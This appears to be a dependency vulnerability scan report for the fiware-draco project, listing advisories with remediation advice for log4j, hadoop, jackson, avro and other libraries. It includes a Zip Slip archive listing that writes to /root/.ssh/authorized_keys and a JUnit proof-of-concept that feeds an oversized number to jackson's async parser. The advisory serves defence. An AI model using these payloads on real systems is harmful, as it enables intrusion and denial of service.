Vulnerabilities

85 via 474 paths

Dependencies

203

Source

GitHub

Commit

a4662f42

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 85
  • 1
Severity
  • 5
  • 33
  • 35
  • 13
Status
  • 86
  • 0
  • 0

critical severity

Deserialization of Untrusted Data

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

There is no fixed version for log4j:log4j.

References

critical severity

Arbitrary Code Execution

  • Vulnerable module: org.apache.hadoop:hadoop-common
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.

Overview

org.apache.hadoop:hadoop-common is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the FileUtil.unTar() API due to improper escape of the input file name before it passed to the shell.

Note:

In vulnerable 3.3.x versions FileUtil.unTar() is used through InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user.

Remediation

Upgrade org.apache.hadoop:hadoop-common to version 2.10.2, 3.2.4, 3.3.3 or higher.

References

critical severity

Arbitrary File Write via Archive Extraction (Zip Slip)

  • Vulnerable module: org.apache.hadoop:hadoop-common
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.

Overview

org.apache.hadoop:hadoop-common is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) in FileUtil where unpackEntries during TAR extraction follows symbolic links which allows writing outside the expected base directory on Windows. This is because getCanonicalPath doesn't resolve symbolic links on Windows.

Details

It is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:


+2018-04-15 22:04:29 ..... 19 19 good.txt

+2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade org.apache.hadoop:hadoop-common to version 2.10.2, 3.2.3, 3.3.3-RC0 or higher.

References

critical severity

Improper Input Validation

  • Vulnerable module: org.codehaus.jackson:jackson-mapper-asl
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13

Overview

org.codehaus.jackson:jackson-mapper-asl is a high-performance data binding package built on Jackson JSON processor.

Affected versions of this package are vulnerable to Improper Input Validation which results in several instances of deserialization of untrusted data. This issue is parallel to vulnerabilities reported and fixed in jackson-databind (CVE-2017-17485, CVE-2017-7525, CVE-2017-15095, CVE-2018-5968, CVE-2018-7489, CVE-2018-1000873, CVE-2019-12086). Although no fix is available for codehaus, this vulnerability can be remediated by using a fixed version of jackson-databind.

Remediation

There is no fixed version for org.codehaus.jackson:jackson-mapper-asl.

References

critical severity

Deserialization of Untrusted Data

  • Vulnerable module: org.apache.avro:avro
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.avro:avro@1.11.4.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.28.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.28.0.

Overview

org.apache.avro:avro is an Avro core components

Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the schema parsing process. An attacker can execute arbitrary code by manipulating the input data to the schema parser.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.

Remediation

Upgrade org.apache.avro:avro to version 1.11.4 or higher.

References

high severity

Integer Overflow

  • Vulnerable module: com.google.protobuf:protobuf-java
  • Introduced through: com.google.protobuf:protobuf-java@2.5.0 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to com.google.protobuf:protobuf-java@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.protobuf:protobuf-java@2.5.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-api@3.3.1 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.google.protobuf:protobuf-java is a Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data.

Affected versions of this package are vulnerable to Integer Overflow by allowing remote authenticated attackers to cause a heap-based buffer overflow in serialisation process.

Remediation

Upgrade com.google.protobuf:protobuf-java to version 3.4.0 or higher.

References

high severity

Uncontrolled Recursion

  • Vulnerable module: org.apache.commons:commons-lang3
  • Introduced through: org.apache.nifi:nifi-database-utils@1.15.3, org.apache.nifi:nifi-flowfile-packager@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@2.5.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-flowfile-packager@1.15.3 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-flowfile-packager@2.0.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.commons:commons-lang3@3.11
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-lang3@3.11
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.commons:commons-lang3@3.11
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-flowfile-packager@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-flowfile-packager@2.6.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@2.0.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 org.apache.nifi:nifi-uuid5@1.15.3 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@2.0.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 io.krakens:java-grok@0.1.9 org.apache.commons:commons-lang3@3.11
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-lang3@3.11
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-avro-record-utils@2.6.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@2.6.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@2.6.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8 org.apache.commons:commons-lang3@3.11
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@2.6.0.

Overview

Affected versions of this package are vulnerable to Uncontrolled Recursion via the ClassUtils.getClass function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.

Remediation

Upgrade org.apache.commons:commons-lang3 to version 3.18.0 or higher.

References

high severity
new

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.12.5, org.apache.nifi:nifi-standard-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.18.6.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.bazaarvoice.jolt:json-utils@0.1.1 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5

Overview

com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.

PoC

The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.

package tools.jackson.core.unittest.dos;

import java.nio.charset.StandardCharsets;

import org.junit.jupiter.api.Test;

import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;

import static org.junit.jupiter.api.Assertions.*;

/**
 * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
 *
 * Authors: sprabhav7, rohan-repos
 * 
 * maxNumberLength default = 1000 characters (digits).
 * A number with more than 1000 digits should be rejected by any parser.
 *
 * BUG: The async parser never calls resetInt()/resetFloat() which is where
 * validateIntegerLength()/validateFPLength() lives. Instead it calls
 * _valueComplete() which skips all number length validation.
 *
 * CWE-770: Allocation of Resources Without Limits or Throttling
 */
class AsyncParserNumberLengthBypassTest {

    private static final int MAX_NUMBER_LENGTH = 1000;
    private static final int TEST_NUMBER_LENGTH = 5000;

    private final JsonFactory factory = new JsonFactory();

    // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
    @Test
    void syncParserRejectsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
        
        // Output to console
        System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
        try {
            try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
                while (p.nextToken() != null) {
                    if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                        System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
                    }
                }
            }
            fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
        } catch (StreamConstraintsException e) {
            System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
        }
    }

    // VULNERABILITY: Async parser accepts the SAME number that sync rejects
    @Test
    void asyncParserAcceptsLongNumber() throws Exception {
        byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);

        NonBlockingByteArrayJsonParser p =
            (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
        p.feedInput(payload, 0, payload.length);
        p.endOfInput();

        boolean foundNumber = false;
        try {
            while (p.nextToken() != null) {
                if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
                    foundNumber = true;
                    String numberText = p.getText();
                    assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
                        "Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
                }
            }
            // Output to console
            System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
            assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
        } catch (StreamConstraintsException e) {
            fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
        }
        p.close();
    }

    private byte[] buildPayloadWithLongInteger(int numDigits) {
        StringBuilder sb = new StringBuilder(numDigits + 10);
        sb.append("{\"v\":");
        for (int i = 0; i < numDigits; i++) {
            sb.append((char) ('1' + (i % 9)));
        }
        sb.append('}');
        return sb.toString().getBytes(StandardCharsets.UTF_8);
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-core
  • Introduced through: com.fasterxml.jackson.core:jackson-core@2.12.5, org.apache.nifi:nifi-standard-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.15.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-standard-utils@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.22.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-standard-utils@1.15.3 com.bazaarvoice.jolt:json-utils@0.1.1 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5 com.fasterxml.jackson.core:jackson-core@2.12.5
